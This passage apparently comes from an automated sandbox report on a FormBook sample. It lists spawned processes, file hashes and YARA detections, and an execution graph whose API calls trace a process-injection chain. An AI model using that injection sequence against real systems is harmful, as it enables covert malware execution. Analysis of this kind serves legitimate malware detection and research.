                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Has exited:false

                                                      General

                                                      Target ID:18
                                                      Start time:06:07:52
                                                      Start date:09/07/2024
                                                      Path:C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe"
                                                      Imagebase:0x5c0000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Has exited:false

                                                      General

                                                      Target ID:19
                                                      Start time:06:08:01
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\SysWOW64\sfc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\sfc.exe"
                                                      Imagebase:0xe40000
                                                      File size:40'448 bytes
                                                      MD5 hash:4D2662964EF299131D049EC1278BE08B
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Has exited:true

                                                      General

                                                      Target ID:21
                                                      Start time:06:08:04
                                                      Start date:09/07/2024
                                                      Path:C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe"
                                                      Imagebase:0x5c0000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Has exited:false

                                                      General

                                                      Target ID:25
                                                      Start time:06:08:21
                                                      Start date:09/07/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff73feb0000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:10.5%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:19.3%
                                                        Total number of Nodes:244
                                                        Total number of Limit Nodes:12
                                                        execution_graph 32842 7345866 32843 7345875 32842->32843 32844 73456fc 32842->32844 32845 7345889 32844->32845 32849 7348120 32844->32849 32866 7348130 32844->32866 32883 7348196 32844->32883 32850 7348124 32849->32850 32901 7348729 32850->32901 32912 734884e 32850->32912 32920 73486a0 32850->32920 32928 73489e4 32850->32928 32932 73490bb 32850->32932 32938 734857a 32850->32938 32943 7348c98 32850->32943 32950 73485fe 32850->32950 32956 734875d 32850->32956 32964 7348a73 32850->32964 32972 7348c51 32850->32972 32980 73487d7 32850->32980 32985 7348734 32850->32985 32992 73487ab 32850->32992 32851 7348152 32851->32844 32867 734814a 32866->32867 32869 7348734 4 API calls 32867->32869 32870 73487d7 2 API calls 32867->32870 32871 7348c51 2 API calls 32867->32871 32872 7348a73 2 API calls 32867->32872 32873 734875d 2 API calls 32867->32873 32874 73485fe 2 API calls 32867->32874 32875 7348c98 4 API calls 32867->32875 32876 734857a 2 API calls 32867->32876 32877 73490bb 2 API calls 32867->32877 32878 73489e4 2 API calls 32867->32878 32879 73486a0 2 API calls 32867->32879 32880 734884e 2 API calls 32867->32880 32881 7348729 4 API calls 32867->32881 32882 73487ab 2 API calls 32867->32882 32868 7348152 32868->32844 32869->32868 32870->32868 32871->32868 32872->32868 32873->32868 32874->32868 32875->32868 32876->32868 32877->32868 32878->32868 32879->32868 32880->32868 32881->32868 32882->32868 32884 7348199 32883->32884 32885 7348124 32883->32885 32884->32844 32887 7348734 4 API calls 32885->32887 32888 73487d7 2 API calls 32885->32888 32889 7348c51 2 API calls 32885->32889 32890 7348a73 2 API calls 32885->32890 32891 734875d 2 API calls 32885->32891 32892 73485fe 2 API calls 32885->32892 32893 7348c98 4 API calls 32885->32893 32894 734857a 2 API calls 32885->32894 32895 73490bb 2 API calls 32885->32895 32896 73489e4 2 API calls 32885->32896 32897 73486a0 2 API calls 32885->32897 32898 734884e 2 API calls 32885->32898 32899 7348729 4 API calls 32885->32899 32900 73487ab 2 API calls 32885->32900 32886 7348152 32886->32844 32887->32886 32888->32886 32889->32886 32890->32886 32891->32886 32892->32886 32893->32886 32894->32886 32895->32886 32896->32886 32897->32886 32898->32886 32899->32886 32900->32886 32902 7348871 32901->32902 32997 7344f90 32902->32997 33001 7344f98 32902->33001 32903 73486ac 32904 734890c 32903->32904 32905 73486c4 32903->32905 33005 7345058 32903->33005 33009 7345050 32903->33009 32904->32851 32905->32851 32910 7345050 WriteProcessMemory 32905->32910 32911 7345058 WriteProcessMemory 32905->32911 32910->32904 32911->32904 32913 73486ac 32912->32913 32914 73486c4 32913->32914 32915 734890c 32913->32915 32918 7345050 WriteProcessMemory 32913->32918 32919 7345058 WriteProcessMemory 32913->32919 32914->32851 32916 7345050 WriteProcessMemory 32914->32916 32917 7345058 WriteProcessMemory 32914->32917 32915->32851 32916->32915 32917->32915 32918->32913 32919->32913 32923 73486ac 32920->32923 32921 73486c4 32921->32851 32926 7345050 WriteProcessMemory 32921->32926 32927 7345058 WriteProcessMemory 32921->32927 32922 734890c 32922->32851 32923->32921 32923->32922 32924 7345050 WriteProcessMemory 32923->32924 32925 7345058 WriteProcessMemory 32923->32925 32924->32923 32925->32923 32926->32922 32927->32922 33013 7345140 32928->33013 33017 7345148 32928->33017 32929 7348a09 32934 7348590 32932->32934 32933 73490cb 32933->32851 32934->32933 33021 73452d6 32934->33021 33025 73452e0 32934->33025 32939 73485a6 32938->32939 32941 73452d6 CreateProcessA 32939->32941 32942 73452e0 CreateProcessA 32939->32942 32940 7348684 32941->32940 32942->32940 32944 7348c9e 32943->32944 32945 7348fef 32944->32945 33029 7344e10 32944->33029 33033 7344e09 32944->33033 33037 7344ec0 32944->33037 33041 7344eb9 32944->33041 32952 7348590 32950->32952 32951 73490cb 32951->32851 32952->32951 32954 73452d6 CreateProcessA 32952->32954 32955 73452e0 CreateProcessA 32952->32955 32953 7348684 32954->32953 32955->32953 32957 73486ac 32956->32957 32958 73486c4 32957->32958 32959 734890c 32957->32959 32960 7345050 WriteProcessMemory 32957->32960 32961 7345058 WriteProcessMemory 32957->32961 32958->32851 32962 7345050 WriteProcessMemory 32958->32962 32963 7345058 WriteProcessMemory 32958->32963 32959->32851 32960->32957 32961->32957 32962->32959 32963->32959 32965 73486ac 32964->32965 32966 73486c4 32965->32966 32967 734890c 32965->32967 32970 7345050 WriteProcessMemory 32965->32970 32971 7345058 WriteProcessMemory 32965->32971 32966->32851 32968 7345050 WriteProcessMemory 32966->32968 32969 7345058 WriteProcessMemory 32966->32969 32967->32851 32968->32967 32969->32967 32970->32965 32971->32965 32974 73486ac 32972->32974 32973 734890c 32973->32851 32974->32973 32975 73486c4 32974->32975 32976 7345050 WriteProcessMemory 32974->32976 32977 7345058 WriteProcessMemory 32974->32977 32975->32851 32978 7345050 WriteProcessMemory 32975->32978 32979 7345058 WriteProcessMemory 32975->32979 32976->32974 32977->32974 32978->32973 32979->32973 32981 73487f6 32980->32981 32983 7345050 WriteProcessMemory 32981->32983 32984 7345058 WriteProcessMemory 32981->32984 32982 7348826 32982->32851 32983->32982 32984->32982 32986 7348741 32985->32986 32987 7348fef 32986->32987 32988 7344ec0 Wow64SetThreadContext 32986->32988 32989 7344eb9 Wow64SetThreadContext 32986->32989 32990 7344e10 ResumeThread 32986->32990 32991 7344e09 ResumeThread 32986->32991 32988->32986 32989->32986 32990->32986 32991->32986 32993 7348f38 32992->32993 32995 7344ec0 Wow64SetThreadContext 32993->32995 32996 7344eb9 Wow64SetThreadContext 32993->32996 32994 7348f56 32995->32994 32996->32994 32998 7344f98 VirtualAllocEx 32997->32998 33000 7345015 32998->33000 33000->32903 33002 7344fd8 VirtualAllocEx 33001->33002 33004 7345015 33002->33004 33004->32903 33006 73450a0 WriteProcessMemory 33005->33006 33008 73450f7 33006->33008 33008->32903 33010 73450a0 WriteProcessMemory 33009->33010 33012 73450f7 33010->33012 33012->32903 33014 7345146 ReadProcessMemory 33013->33014 33016 73451d7 33014->33016 33016->32929 33018 7345169 ReadProcessMemory 33017->33018 33020 73451d7 33018->33020 33020->32929 33022 73452e0 CreateProcessA 33021->33022 33024 734552b 33022->33024 33026 7345369 CreateProcessA 33025->33026 33028 734552b 33026->33028 33030 7344e50 ResumeThread 33029->33030 33032 7344e81 33030->33032 33032->32944 33034 7344e10 ResumeThread 33033->33034 33036 7344e81 33034->33036 33036->32944 33038 7344f05 Wow64SetThreadContext 33037->33038 33040 7344f4d 33038->33040 33040->32944 33042 7344ec0 Wow64SetThreadContext 33041->33042 33044 7344f4d 33042->33044 33044->32944 32815 5432a80 32817 5432bb1 32815->32817 32818 5432ab1 32815->32818 32816 5432abd 32818->32816 32821 54338c9 32818->32821 32826 54338d8 32818->32826 32822 5433903 32821->32822 32823 54339b2 32822->32823 32831 54347b1 32822->32831 32835 54347c0 32822->32835 32827 5433903 32826->32827 32828 54339b2 32827->32828 32829 54347b1 CreateWindowExW 32827->32829 32830 54347c0 CreateWindowExW 32827->32830 32829->32828 32830->32828 32832 54347c0 32831->32832 32838 54327d0 32832->32838 32836 54327d0 CreateWindowExW 32835->32836 32837 54347f5 32836->32837 32837->32823 32839 5434810 CreateWindowExW 32838->32839 32841 5434934 32839->32841 33045 2dbdec8 33046 2dbdedc 33045->33046 33048 2dbdf01 33046->33048 33049 2dbd180 33046->33049 33050 2dbe0a8 LoadLibraryExW 33049->33050 33052 2dbe121 33050->33052 33052->33048 33060 2db4668 33061 2db4672 33060->33061 33063 2db4758 33060->33063 33064 2db475c 33063->33064 33068 2db4859 33064->33068 33072 2db4868 33064->33072 33070 2db485c 33068->33070 33069 2db496c 33069->33069 33070->33069 33076 2db44e0 33070->33076 33073 2db488f 33072->33073 33074 2db44e0 CreateActCtxA 33073->33074 33075 2db496c 33073->33075 33074->33075 33077 2db58f8 CreateActCtxA 33076->33077 33079 2db59bb 33077->33079 33080 5436db0 33081 5436de0 33080->33081 33082 5436e22 33081->33082 33083 5436ecc 33081->33083 33084 5436e7a CallWindowProcW 33082->33084 33086 5436e29 33082->33086 33087 54327fc 33083->33087 33084->33086 33088 5432807 33087->33088 33090 5435789 33088->33090 33091 5432924 CallWindowProcW 33088->33091 33091->33090 33092 128d01c 33093 128d034 33092->33093 33094 128d08e 33093->33094 33098 54327fc CallWindowProcW 33093->33098 33099 5432850 33093->33099 33103 54349c8 33093->33103 33107 54349b9 33093->33107 33098->33094 33101 54327f9 33099->33101 33102 5435789 33101->33102 33111 5432924 CallWindowProcW 33101->33111 33104 54349ee 33103->33104 33105 54327fc CallWindowProcW 33104->33105 33106 5434a0f 33105->33106 33106->33094 33108 54349c8 33107->33108 33109 54327fc CallWindowProcW 33108->33109 33110 5434a0f 33109->33110 33110->33094 33111->33102 33112 2dbde20 33113 2dbde68 GetModuleHandleW 33112->33113 33114 2dbde62 33112->33114 33115 2dbde95 33113->33115 33114->33113 33116 7349308 33117 7349493 33116->33117 33118 734932e 33116->33118 33118->33117 33120 7347850 33118->33120 33121 7349588 PostMessageW 33120->33121 33122 73495f4 33121->33122 33122->33118 33053 73457d9 33054 734577f 33053->33054 33059 73457fe 33053->33059 33055 7345971 33054->33055 33056 7348196 12 API calls 33054->33056 33057 7348130 12 API calls 33054->33057 33058 7348120 12 API calls 33054->33058 33056->33054 33057->33054 33058->33054

                                                        Executed Functions

                                                        Function 0543A420 Relevance: 27.3, Strings: 20, Instructions: 2263COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 543a420-543aeb0 call 5439f54 call 5439f64 * 10 call 5439f74 call 5439f84 call 543a010 * 8 call 5439f84 call 543a010 * 4 call 5439f74 call 5439f84 call 543a010 * 5 call 5439f74 call 5439f84 call 543a010 * 7 call 543a020 call 5430918 * 5 call 543a030 call 543a040 call 543a050 call 543a060 call 543a070 call 543a080 call 543a090 call 543a0a0 call 543a0b0 call 543a0a0 call 543a0b0 call 543a0a0 245 543af79-543af83 0->245 246 543aeb5-543aeed 245->246 247 543af89-543b26e call 543a0b0 call 543a0a0 call 543a0b0 call 543a0a0 call 543a0b0 call 543a0a0 245->247 254 543aef3-543af04 246->254 255 543ca81-543caa8 call 543a1f0 246->255 247->255 308 543b274-543b2a3 call 543a0c0 247->308 254->255 257 543af0a-543af27 254->257 265 543caad-543cab7 255->265 257->255 259 543af2d-543af6b 257->259 259->255 262 543af71-543af78 259->262 262->245 267 543caf0-543cb03 call 543a210 265->267 268 543cab9-543cad4 call 543a200 265->268 276 543cb13-543cb15 267->276 277 543cb05-543cb0e call 543a200 267->277 268->267 280 543cad6-543cae8 268->280 277->276 280->267 312 543b2aa-543ca80 call 543a0b0 call 543a0a0 call 543a0b0 call 543a0a0 call 543a0b0 call 543a0a0 call 543a0d0 call 543a0b0 call 543a0a0 call 543a0b0 call 543a0e0 * 2 call 543a050 call 543a060 call 543a080 call 543a090 call 543a0f0 call 543a100 call 543a110 call 543a120 call 543a050 call 543a060 call 543a080 call 543a090 call 543a130 call 543a140 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 * 2 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a0f0 call 543a110 call 543a120 call 543a050 call 543a060 call 543a080 call 543a090 call 543a130 call 543a140 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a0e0 call 543a050 call 543a060 call 543a080 call 543a090 call 543a0f0 call 543a110 call 543a120 call 543a050 call 543a060 call 543a080 call 543a090 call 543a130 call 543a140 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a0e0 call 543a050 call 543a060 call 543a080 call 543a090 call 543a0f0 call 543a110 call 543a120 call 543a050 call 543a060 call 543a080 call 543a090 call 543a130 call 543a140 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a170 call 543a160 call 543a150 call 543a170 call 543a160 call 543a150 call 543a170 call 543a150 call 543a170 call 543a150 call 543a170 call 543a160 call 543a050 call 543a060 call 543a080 call 543a090 call 543a180 call 543a190 call 543a1a0 call 543a0e0 * 5 call 543a1b0 call 543a1c0 call 543a1d0 call 543a060 call 5430ad4 call 543a1e0 call 5430ad4 * 4 call 543a1e0 308->312
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: '$($,$4$6$9$:$H$U$U$c$c$e$e$k$l$l$l$w$$%q
                                                        • API String ID: 0-2663843966
                                                        • Opcode ID: d695bb919f2b96574d8710692d0a32e19e235b3d5b534aaca9ace223f8b537d0
                                                        • Instruction ID: 9598dde88d87d3e0b015396a053ec1050957a15224e0ffa7b1fa9b49d80acd20
                                                        • Opcode Fuzzy Hash: d695bb919f2b96574d8710692d0a32e19e235b3d5b534aaca9ace223f8b537d0
                                                        • Instruction Fuzzy Hash: 6433D230A007148FDB65EF79C894BDAB7B6AF89300F5045AED44AAB360DB71AD81CF51
                                                        Function 0543A411 Relevance: 27.2, Strings: 20, Instructions: 2170COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 703 543a411-543a469 708 543a473-543a477 call 5439f54 703->708 710 543a47c-543a487 708->710 712 543a491-543a495 call 5439f64 710->712 714 543a49a-543a5dd call 5439f64 * 9 call 5439f74 712->714 756 543a5e7-543a5eb call 5439f84 714->756 758 543a5f0-543a5fb 756->758 760 543a605-543a609 call 543a010 758->760 762 543a60e-543a961 call 543a010 * 7 call 5439f84 call 543a010 * 4 call 5439f74 call 5439f84 call 543a010 * 5 call 5439f74 call 5439f84 call 543a010 * 7 760->762 876 543a96b-543a96f call 543a020 762->876 878 543a974-543aaea call 5430918 * 5 call 543a030 call 543a040 876->878 906 543aaf4-543aaf9 878->906 907 543ab01-543aeb0 call 543a050 call 543a060 call 543a070 call 543a080 call 543a090 call 543a0a0 call 543a0b0 call 543a0a0 call 543a0b0 call 543a0a0 906->907 949 543af79-543af83 907->949 950 543aeb5-543aeed 949->950 951 543af89-543b243 call 543a0b0 call 543a0a0 call 543a0b0 call 543a0a0 call 543a0b0 call 543a0a0 949->951 958 543aef3-543af04 950->958 959 543ca81-543ca9b 950->959 1009 543b248-543b264 951->1009 958->959 961 543af0a-543af27 958->961 967 543caa0-543caa8 call 543a1f0 959->967 961->959 963 543af2d-543af6b 961->963 963->959 966 543af71-543af78 963->966 966->949 969 543caad-543cab7 967->969 971 543caf0-543cb03 call 543a210 969->971 972 543cab9-543cad4 call 543a200 969->972 980 543cb13-543cb15 971->980 981 543cb05-543cb0e call 543a200 971->981 972->971 984 543cad6-543cae8 972->984 981->980 984->971 1011 543b26a-543b26e 1009->1011 1011->959 1012 543b274-543b298 call 543a0c0 1011->1012 1015 543b29d-543b2a3 1012->1015 1016 543b2aa-543ca80 call 543a0b0 call 543a0a0 call 543a0b0 call 543a0a0 call 543a0b0 call 543a0a0 call 543a0d0 call 543a0b0 call 543a0a0 call 543a0b0 call 543a0e0 * 2 call 543a050 call 543a060 call 543a080 call 543a090 call 543a0f0 call 543a100 call 543a110 call 543a120 call 543a050 call 543a060 call 543a080 call 543a090 call 543a130 call 543a140 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 * 2 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a0f0 call 543a110 call 543a120 call 543a050 call 543a060 call 543a080 call 543a090 call 543a130 call 543a140 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a0e0 call 543a050 call 543a060 call 543a080 call 543a090 call 543a0f0 call 543a110 call 543a120 call 543a050 call 543a060 call 543a080 call 543a090 call 543a130 call 543a140 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a160 call 543a0e0 call 543a050 call 543a060 call 543a080 call 543a090 call 543a0f0 call 543a110 call 543a120 call 543a050 call 543a060 call 543a080 call 543a090 call 543a130 call 543a140 call 543a150 call 543a160 call 543a150 call 543a160 call 543a150 call 543a170 call 543a160 call 543a150 call 543a170 call 543a160 call 543a150 call 543a170 call 543a150 call 543a170 call 543a150 call 543a170 call 543a160 call 543a050 call 543a060 call 543a080 call 543a090 call 543a180 call 543a190 call 543a1a0 call 543a0e0 * 5 call 543a1b0 call 543a1c0 call 543a1d0 call 543a060 call 5430ad4 call 543a1e0 call 5430ad4 * 4 call 543a1e0 1015->1016
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: '$($,$4$6$9$:$H$U$U$c$c$e$e$k$l$l$l$w$$%q
                                                        • API String ID: 0-2663843966
                                                        • Opcode ID: 219a0dbd3913814e2d478c9e77d86dbf3bde740fd24b59e58f45a55259cfe4aa
                                                        • Instruction ID: 2433f58a48878670edb4f752f0a547c14b331c0c2a6bdbd5c7b7580ff8d50a30
                                                        • Opcode Fuzzy Hash: 219a0dbd3913814e2d478c9e77d86dbf3bde740fd24b59e58f45a55259cfe4aa
                                                        • Instruction Fuzzy Hash: 2B23D234A007148FDB65EF79C854BDAB7B6AF89300F5045AED44AAB360DF31AA81CF51
                                                        Function 0734B170 Relevance: .4, Instructions: 407COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 872fb0780a78c8a2fcffaf7429062bdb0962c419cd59715fe83da317b8dc936a
                                                        • Instruction ID: 79e3792edea94f1bcec9de980f6550574a2bddd881fa970600feabec0bcc4c48
                                                        • Opcode Fuzzy Hash: 872fb0780a78c8a2fcffaf7429062bdb0962c419cd59715fe83da317b8dc936a
                                                        • Instruction Fuzzy Hash: 92E169F1B006558FEB29DBB5C450BAEB7F6AF89300F54846DD04A9B790CB35E901CB61
                                                        Function 02DB85B6 Relevance: .4, Instructions: 356COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6ea24fcd2491c29683ba06d1535d7b79eeca329efcf2d0b985613fe7700e252e
                                                        • Instruction ID: 1cedbe24bc3b95cbfddac77272461ca584e0001513d362ec85a298ce960b8d0a
                                                        • Opcode Fuzzy Hash: 6ea24fcd2491c29683ba06d1535d7b79eeca329efcf2d0b985613fe7700e252e
                                                        • Instruction Fuzzy Hash: F5E1AE74A0162ACFDB15DF79D894AAEBBF2BF88300F118559E406EB354DB34AD01DB90
                                                        Function 073486A0 Relevance: .1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4298352cda6a95f8640727bdf244bb0b98a1640a51589da75b9280812f94a233
                                                        • Instruction ID: 879e44eea14c6f8d94291dcd9889e8537b7c7b9780d9b0f8c0c3cb7002f528b7
                                                        • Opcode Fuzzy Hash: 4298352cda6a95f8640727bdf244bb0b98a1640a51589da75b9280812f94a233
                                                        • Instruction Fuzzy Hash: F751BFB4919228CFEB64CF64C844BE9BBF9EB4A301F0090EAD50DA7241D7716E85CF11
                                                        Function 07348729 Relevance: .1, Instructions: 137COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a52a7406266cbcc058e8f960367c1cf68ef0dc316c92c04dc26cd5a0629da190
                                                        • Instruction ID: 2c252b591959c62b0c83e39492233ec2fd905d78e7b717448d734ed46f89854e
                                                        • Opcode Fuzzy Hash: a52a7406266cbcc058e8f960367c1cf68ef0dc316c92c04dc26cd5a0629da190
                                                        • Instruction Fuzzy Hash: B551D2B4D19228DFEB68CF64C854BE8BBF9EB4A301F0090EAD50DA7241D7356A85CF10
                                                        Function 07348C51 Relevance: .1, Instructions: 118COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 388ec3e7a219123844b9ada47f9b9f189754ad6c0b0bdf23fca77a5f2d02255f
                                                        • Instruction ID: ee7506ef567407a717fdcf1d9e8a107fc1c66d3ab3ac5a3a184082c14da963f3
                                                        • Opcode Fuzzy Hash: 388ec3e7a219123844b9ada47f9b9f189754ad6c0b0bdf23fca77a5f2d02255f
                                                        • Instruction Fuzzy Hash: C041E0B4D19228DFEB68DF64C944BE8BBF8EB4A301F0090EAD50DA7241D7746A85CF11
                                                        Function 0734875D Relevance: .1, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a173735f5417b9b2a40fbb1c90415e49baff4672f16374f585b437e07c2d940e
                                                        • Instruction ID: b973e8e6883ec9e3b31e93ced5b0a1b195d4c2f47335d556a1f9fbab56e32e67
                                                        • Opcode Fuzzy Hash: a173735f5417b9b2a40fbb1c90415e49baff4672f16374f585b437e07c2d940e
                                                        • Instruction Fuzzy Hash: 9341C0B5D19228DFEB64CF64C944BE8BBF9EB4A301F0090EAD10DA7241D774AA85CF11
                                                        Function 07348A73 Relevance: .1, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e0288411d5c557fa68fbdc4335368fe082f4f9c4b4d364f94b0d45ac6cf429c6
                                                        • Instruction ID: fefef2f41c5026f912e282f4c7f6c913770c5bc4b2879a238bcd2917541aac49
                                                        • Opcode Fuzzy Hash: e0288411d5c557fa68fbdc4335368fe082f4f9c4b4d364f94b0d45ac6cf429c6
                                                        • Instruction Fuzzy Hash: 4A4104B4919228DFEB65CF64C844BE8BBF9EB4A301F0090EAD10DA7242C7746A85CF11
                                                        Function 0734884E Relevance: .1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 72a8f6d3973fd4d83783bacf5114387d760418b325419f5256ddc3e8221a6285
                                                        • Instruction ID: f3fad4853496b348dbf4e33b5ccc21aeeb3e1f84414457f0815dfdd8ec55daac
